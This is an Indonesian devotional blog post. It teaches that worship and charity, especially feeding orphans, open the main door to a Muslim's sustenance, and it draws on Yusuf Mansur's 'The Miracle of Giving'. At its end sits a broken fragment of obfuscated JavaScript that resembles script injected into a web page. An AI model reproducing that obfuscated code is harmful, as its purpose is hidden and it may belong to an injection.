Jalan Rezeki Utama Seorang Muslim

jalan rezeki

 

Akan datang kepada kita rezeki yang datangnya dari Allah, dan biasanya dari jalan yang tak disangka-sangka. Namun, perlu diingat bahwa rezeki tidak akan datang tanpa adanya usaha dari kita. Dibutuhkan sebuah pemancing untuk menarik rezeki itu. Selalu ada jalan rezeki bagi mereka yang bersungguh-sungguh untuk menjemput rezekinya.

Rezeki tidak akan datang bagi mereka yang enggan menjemputnya. Kebanyakan kita kan maunya rezeki banyak tanpa ada usaha untuk menjemputnya. Kalau ingin hidup enak, maka harus siap merasakan berbagai kepedihan Sebelum kesenangan didapat maka kesedihan haruslah dirasakan. Entah itu berupa kesulitan dalam menjemput rezeki tersebut.

Namun, disini saya ingin memberitahukan bahwa ada satu jalan yang akan memudahkan kita menjemput rezeki utama. Akan selalu ada jalan yang membuat seseorang menjadi rajin dalam beribadah, menambah porsi ibadahnya, dan juga mengistiqomahkannya, ini pasti. Dan inilah yang disebut sebagai pintu rezeki utam seorang muslim.

Mengapa ketika kita beribadah akan ada suatu keberkahan bagi sang pelaku ibadah tersebut? Karena akan ada satu mata rantai ekonomi yang terjadi ketika seseorang beribadah pada tuhannya. Contohnya adalah bersedekah, memberi makan anak yatim, shoalat bersama anak yatim, dan lain sebagainya. Wah, begitu banyak mata rantai yang akan terjadi dengan sendirinya ; seperti membelikan makanan untuk anak yatim,A� menyediakan pakaian bagi mereka , dan masih banyak lagi!

Initnya adalah ketika kita mengeluarkan sesuatu dengan niat ibadah kepada Allah seperti memberi makan anak yatim, maka rezeki akan datang menghampiri dengan jalan yang tidak disangka-sangka. Berkahnya dalam beribadah, itulah yang dapat kita rasakan.

(diolah dari buku yusuf mansur yang berjudul the miracle of giving) IComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

Related Posts

× Assalamualaikum